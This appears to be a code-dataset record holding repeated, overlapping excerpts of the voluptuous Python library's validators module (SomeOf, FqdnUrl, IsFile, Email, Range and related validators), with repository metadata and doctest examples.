:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | FqdnUrl | python | def FqdnUrl(v):
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError | Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org' | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L392-L407 | [
"def _url_validation(v):\n parsed = urlparse.urlparse(v)\n if not parsed.scheme or not parsed.netloc:\n raise UrlInvalid(\"must have a URL scheme and host\")\n return parsed\n"
] | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
"""Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com'
"""
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
"""Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None)
"""
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
"""Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None)
"""
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
"""Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None)
"""
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | IsFile | python | def IsFile(v):
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file') | Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L429-L446 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
